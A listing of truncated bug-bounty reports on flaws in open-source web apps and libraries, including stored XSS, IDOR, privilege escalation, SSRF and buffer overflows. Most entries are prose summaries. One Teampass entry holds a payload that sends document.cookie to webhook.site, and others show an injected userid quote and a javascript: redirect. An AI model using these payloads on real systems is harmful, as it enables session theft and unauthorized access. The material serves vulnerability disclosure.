Stored XSS in the delete confirmation popup
Description The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof of Concept Step 1: The user with the privilege to create groups creates a new group by passing a payload into...
Server-Side Template Injection leads to Remote Code Execution
Description Admin or Staff with "Mass mailer" permission can perform a Server-Side Template Injection attack Proof of Concept Log in as an admin or a staff who has "Mass mailer" permission, edit a message In the "Email content" field, insert the following value and click "Update and preview" %...
Leak Secret tokens by changing baseURL
Description nuxt-api-party allows developers to easily hook up APIs. You can configure API URLs and Credentials to be sent on requests. It is suggested in the documentation that this plugin is capable of handling sensitive data. There is a design flaw that could allow an attacker to extract priva...
Stored XSS on entire Client site
Description Admin or Staff with "System" permission can produce a stored XSS on the entire Client site. Proof of Concept Edit the "Signature" field to this value "FOSSBilling.org - Client Management, Invoice and Support Software"" Then it will trigger on every Client screen. Seems like it was rendered ...
The ability to edit groups owned by any user.
Description The edit group function does not check the owner, allowing for the possibility to modify a group without being the owner of that group. Proof of Concept Step 1: We have User1 who owns Group 1 and Group 2; User5 who owns Group 5. Step 2: User1 performs an edit group action and changes...
Desktop APP XSS to RCE
🔒️ Requirements The user must load the malicious configuration and click on the buttons. 📝 Description This exploitation relies on several issues which chained together lead to an RCE. In the following subsection, I will try to explain it as best I can. 💉 Not sanitized HTML injection In the...
Improper Authorization leads to privilege escalation
Description The application improperly performs user authorization, resulting in a user with the user management role being able to modify their own permissions or those of others. Proof of Concept Step 1: The highest-level administrator or an administrator with the permission to create roles...
Incorrect Authorization leads to delete user
Description The application has incorrect permission settings, leading to a user with user administration rights being able to delete anyone, including users who are not under their management authority. Proof of Concept Step 1: The User Demo super admin creates a user admin with user...
Session Fixation Vulnerability
Description The application does not generate a new PHPSESSID cookie after the user authenticates successfully. A malicious user is able to create a new session cookie value and inject it into a victim pre-authentication. After the victim logs in, the injected cookie becomes valid, giving the...
The user can delete himself
Description Bypassing the conditional check allows the user to delete himself. Proof of Concept Step 1: The user with id 18834 attempts to delete himself but encounters an error. Step 2: By using userid=18834' instead of userid=18834, the user was able to successfully delete himself...
Able to change username that is by default unchangeable
Description The website receives input from the user that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified. Proof of Concept Step 1: We have a user with ID 18833 and the...
The app allows setting a new password that is the same as the old password
Description 1/ Access and log in to the demo website: https://demo.openitcockpit.io 2/ In the change password function, set the new password to be the same as the old password. 3/ Log out and log in again to check; it succeeds. Proof of Concept Link video PoC:...
Sensitive Cookie Without Secure Flag
Description Access and log in to the demo website: https://demo.openitcockpit.io/ Press F12 on your keyboard or right-click on the website to open the dev tools. In the Application tab, choose Cookies: there are some sensitive cookies without the Secure flag, CookieAuth and csrfToken. Proof of Concept Link imag...
Sensitive Cookie Without HttpOnly Flag
Description Access and log in to the demo website: https://demo.openitcockpit.io/ Press F12 on your keyboard or right-click on the website to open the dev tools. In the Application tab, choose Cookies: the sensitive CookieAuth cookie is set without the HttpOnly flag. Proof of Concept Link image evidence:...
heap-buffer-overflow in function id3dmx_flush filters/reframe_mp3.c
Description Heap-buffer-overflow in MP4Box. Version: MP4Box - GPAC version 2.3-DEV-revrelease (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC:...
Desktop APP RCE via saveDraft IPC
🔒️ Requirements The user must load a malicious project. 📝 Description In version 20.3.3 commit 5383c20e947fd772668316e407edc5d5db4850db, the shell=true option is added to a spawn execution. This is really dangerous as it allows a malicious user to execute commands even from attributes. Example: j...
XSS Filter Bypass in Folder Name leading to Information Disclosure
Description Proof of Concept First, log in to Teampass and go to the Folders tab. Create a new folder using Hex entities in the Label. In this case: scriptfetchhttpswebhooksitejlk documentcookiescript which is fetch'https://webhook.site/jlk/' + document.cookie Next, select the created folder and...
Local file read through %load_json
Description When ALLOW_PLANTUML_INCLUDE is set to false (the default setting in the online server), !include processing is turned off, preventing local files from being read. However, other features like %load_json can still access local files. Since many people will run plantuml-server in its defaul...
URL Restriction Bypass
Description In attempting to fix a previous issue, the PATTERNUSERINFO regular expression was changed. This change introduced another way to bypass the URL allowlist by introducing non-alphanumeric characters into the user information part of the URL. Proof of Concept Run PlantUML with...
IDOR in message deletion
Description A user can delete others' messages. We know the report https://huntr.dev/bounties/24ae402f-220f-41c6-962e-47c26938986e/ , but we find that one case is not fixed. Proof of Concept 1. user1 sends admin greeting card1 2. user2 sends admin greeting card2 3. user1 deletes his message related ...
Users can order Add-Ons Separately
Description I found a requirement that addons must be purchased in conjunction with a product. However, a vulnerability has been discovered where an attacker can modify the product ID during the order process, allowing them to bypass the main product order requirement and directly purchase the...
Directory listing in multiple endpoints
Description Teampass has directory listing by default for various endpoints that eventually discloses application-specific and user data and files. Proof of Concept Visit the following endpoint without logging in to the application. Sensitive - https://127.0.0.1/includes configs -...
Stored XSS via Default session expiration time
Description The Default session expiration time feature, when HTML/JS tags are submitted, executes the code on the login page. Proof of Concept Log in to Teampass and go to Settings > Options. http://127.0.0.1/index.php?page=options In the Default session expiration time input field insert an XSS payload...
Downloadable product type lacks order status check
Description There is a vulnerability in FOSSBilling where upgrading non-active orders is prevented, but it is possible to still do so through the upgrade API...
Privilege Escalation Vulnerability in Product Upgrade Module
Description Our product upgrade module contained a privilege escalation vulnerability that would allow an unauthorized user to upgrade to a product they were not authorized to. After an administrator had configured Product 1 to be upgradable to Product 2, but not Product 3, a user could use Burp Suite to intercept...
Security vulnerability in product bundling feature
Description Our e-commerce platform offers a bundled sales promotion feature, allowing an administrator to bind the sale of a product to an addon. However, we have identified a security vulnerability that exists in this feature. After an administrator cancels a bundle offer, users can still make...
Serious Security Vulnerability Discovered in Promotion
Description I am writing to report a serious security vulnerability that we have uncovered. Specifically, we have found that promotions applied to certain client groups are still being honored even after the promotions are no longer applicable to those groups. This means that attackers can...
We can still order the product even if it is disabled
Description I am writing to report a potential security vulnerability that was uncovered in your platform. Specifically, we discovered that your product purchase functionality can still be accessed via API even after the product has been disabled and is no longer available for sale. Proof of...
Stored XSS in Survey Groups Function
Description By injecting the payloads into the Title and Description fields, users who visit the "Survey list" screen may be compromised. Proof of Concept Step 1: Log in as Administrator, go to the "Survey list" screen, click the "create survey group" button. Step 2: Inject the payload into the fields...
Stored XSS vulnerability
Description The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof of Concept 1 Step 1: The user has the right to access and perform the creation of surveys, with the payload...
Unauthenticated Blind SSRF
Description The Oxeye research team found Owncast vulnerable to an Unauthenticated Blind SSRF vulnerability. This vulnerability may allow an unauthenticated attacker to force the Owncast server to send HTTP requests to arbitrary locations using the GET HTTP method. This vulnerability also allows...
Open Redirect on follow/unfollow user's profile action
Description The idea is similar to CVE-2022-1058 https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d/ . Browsers interpret \example.com as https://example.com, leading to an open redirect. Proof of Concept The vulnerable API lies in the follow/unfollow action on a user's profile. In order to...
Formula Injection vulnerability in CSV export feature
Description The admidio application is vulnerable to Formula Injection/CSV injection via the Firstname and Lastname input fields. These vulnerabilities allow unauthenticated attackers to execute arbitrary code via a crafted Excel file. Proof of Concept 1. Create a member with role Associations boa...
Stored XSS via file upload in FireFox
Description Upload html file containing XSS payload. Payload ' On opening and refreshing the page, XSS payload executes in Firefox. Proof of Concept https://drive.google.com/file/d/1Irkg0u-8DcEizRSN3xE87ezEWmp0L4j/view?usp=sharing...
HTML Injection in Folder Name
Description The folder name is not sanitized and, due to missing output encoding, HTML user input is rendered in the webpage during folder deletion. Proof of Concept 1. Log in to Teampass as any user. 2. Go to the Folders tab. 3. Create a new folder with an HTML tag in the Label. Example: HTM...
IDOR can make attackers add or close others' unavailable
Both user1 and user2 are Providers. 1. user1 logs in and adds an unavailable 2. The request can look like POST /index.php/backendapi/ajaxsaveunavailable HTTP/1.1...
We can still send the photo as a greeting card even if the album is locked
1. admin creates an album and uploads a photo 2. member-1 logs in and sends the photo as a greeting card to member-2 3. member-1 uses Burp Suite to intercept the request, which can look like POST /admprogram/modules/ecards/ecardsend.php HTTP/1.1...
Stored XSS in many configuration fields
Description Paste the XSS payload into the configuration fields. I think there are many configuration fields that can be vulnerable to Stored XSS, such as the configuration fields in Options, MFA, API, Emails,... hope you check them too. Proof of Concept...
Create multiple user with the same username (Race Condition)
Description Administrator users can create multiple users with the same username, which breaks the logic of the web application. Proof of Concept Step 1: On the Administration > User Management > Manager User screen, click the "New Local User" button. Step 2: Fill in all the required fields; notice that the...
HTML Injection / Possible XSS
Description In pimcore I was able to identify an Unauthenticated HTML Injection / possible XSS. Conditions: 2-factor authentication must not be set up before. Vulnerable Endpoint: http://localhost/admin/login/2fa-setup Vulnerable Param: error= How it works: so basically any admin who has not set up 2...
CSRF on /api/graphql query executing the mutations through GET requests
Description Mutations are saveRecord or createProcess queries used in GraphQL. SuiteCRM prevents CSRF in this functionality by sending a POST request with an X-Xsrf-Token header. The bug here is that when we send a GET request, the backend does not expect the X-Xsrf-Token header. Using this, an...
Stored XSS on user's name
Description Paste the XSS payload into the Name or Last name field. The XSS vulnerability will trigger. Proof of Concept https://drive.google.com/file/d/1hoZkCxzTQbcIDy28hKJyjyrOD1Pcaaz0/view?usp=sharing...
The web app does not verify weak password at backend
Description Access and log in to the demo website: https://cloudexplorer-lite-demo.fit2cloud.com/ In the change password function, the backend does not verify weak passwords, so a user can: 1/ Set the new password to be the same as the old password. 2/ Set a new password of one character, such as 1. This case c...
missing permission check for API /setting/workspace/member/update
Proof of Concept 1. user1 is the workspace administrator of workspace1 2. user2 is a member of workspace1 3. user1 updates user2's information, for example updating them to workspace administrator 4. Use Burp Suite to intercept the request POST /setting/workspace/member/update HTTP/1.1 Host: 192.168.213.128:8081 Content-Length: 144 Accept-Language: zh-CN WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7 User-Agent:...
Stored XSS in End page
Description Allows a user who only has the authority to create surveys, not the administrator, to bypass validation and embed javascript schemes when creating surveys. Steps to reproduce - Log in as administrator 1. Open User management and create a user with create-surveys-only permissions. 2. Log out...
OOB read from unchecked return
Environment: Distributor ID: Debian; Description: Debian GNU/Linux bookworm/sid. Version: I checked against the latest release as of 05/29/23, the current master branch at commit 4f810869b06b5d7b0cb73d166864dfb4b1e900f6 . Description This AddressSanitizer output is indicating a read on an unknown...
DOM Cross Site Scripting and open redirect
Vulnerable Endpoint: https://demo.saleor.io/default-channel/en-US/account/login/?next=javascript:alert1 Description: 1. Hello team, recently I found that on the saleor React storefront dashboard there is a DOM XSS and open-redirect vulnerability. Steps to reproduce XSS: 1. Go to the above mentioned...
Cross-Site Scripting (Stored XSS)
Description With the Association's board role, I can add a new web link. But when I create a link, in the Link name input field I can insert an onfocus/autofocus attribute because double quotes are not processed. Proof of Concept 1. Log in with an account with the Association's board role 2. Access the function Web...
Improper Authorization in "Customer automation rules" function
Description The product performs authorization checks incorrectly when an unauthorized actor tries to access a resource or perform an action. Proof of Concept The user does not have permission to delete the rule. Location - GET /admin/customermanagementframework/rules/list - POST...
Integer Overflow in tjexample.c
Description The tjexample.c example program uses the tjAlloc function to allocate the output buffer for the JPEG buffer. tjAlloc uses malloc, which takes a size_t number of bytes, an unsigned integer. However, tjAlloc itself takes the number of bytes as a signed integer:...